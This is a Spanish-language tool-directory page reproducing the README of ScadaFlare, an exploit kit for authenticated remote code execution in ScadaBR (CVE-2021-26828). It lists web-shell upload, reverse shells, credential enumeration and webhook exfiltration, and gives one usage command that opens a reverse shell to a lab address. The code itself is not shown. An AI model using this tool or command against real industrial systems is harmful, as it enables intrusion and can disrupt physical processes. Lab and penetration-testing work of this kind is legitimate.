Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework de explotación RCE autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Herramientas/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad SCADA/ICSExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework de explotación RCE autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

58hace 9 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ScadaFlare - Kit de explotación de RCE autenticado CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Exploit modular de RCE post-autenticación dirigido a ScadaBR <1.1.0, mejorado para operaciones de red team.

ScadaFlare Demo

Características

  • Sube una shell .jsp armada a través de view_edit.shtm
  • Compatible con payloads de Linux y Windows
  • Soporte de proxy SOCKS5 / HTTP
  • Disparador de reverse shell (estándar o base64)
  • Módulos de enumeración (BD, credenciales, Log4Shell, etc.)
  • Exfiltración por webhook (Slack / Discord)
  • Generación de scripts de recursos de Metasploit
  • Soporte de limpieza (kill switch)
  • Mapeo de Técnicas MITRE ATT&CK

    FaseTécnicaID
    Acceso inicial (post-autenticación)Cuentas válidasT1078
    EjecuciónExplotación de aplicación expuesta al públicoT1190
    Ejecución de comandosWeb ShellT1505.003
    Acciones de privilegiosModificar contenido webT1505
    Acceso a credencialesCredenciales en archivos de configuraciónT1552.001
    DescubrimientoDescubrimiento remoto de sistemasT1018
    ExfiltraciónExfiltración a través de servicio webT1567.002
    Evasión de defensasProxy y tunelización de protocoloT1090

    CVE

    • CVE-2021-26828
    • Descubierto por Fellipe Oliveira
    • Exploit mejorado y modularizado

    Por Qué Existe

    Este exploit se desarrolló durante el análisis del escenario HTB Pro Lab: Alchemy. El PoC original de Fellipe Oliveira era sólido, pero:

    • Estaba escrito en Python 2
    • Carecía de funciones modernas como soporte de proxy, limpieza de shell y encadenamiento de enumeración
    • Era difícil de ampliar o integrar en flujos de trabajo de red team

    Esta versión, ScadaFlare, es una reescritura completa en Python 3 con soporte modular, múltiples estrategias de evasión, anulación de la detección de SO, integración de webhooks, soporte de proxy SOCKS y cadenas de enumeración para uso operativo en el mundo real.

    Uso

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Solo Uso Legal y Ético

    ScadaFlare está diseñado únicamente para:

    • Educación en hacking ético
    • Pruebas en laboratorio SCADA
    • Investigación defensiva y validación de vulnerabilidades

    El uso no autorizado contra sistemas industriales reales puede:

    • Interrumpir procesos físicos
    • Causar daños o riesgos de seguridad
    • Conllevar graves consecuencias legales

    Al usar esta herramienta aceptas toda la responsabilidad de:

    • Obtener autorización explícita por escrito
    • Operar únicamente en entornos aprobados

    Licencia

    Licencia MIT – consulta LICENSE

    Descargar herramienta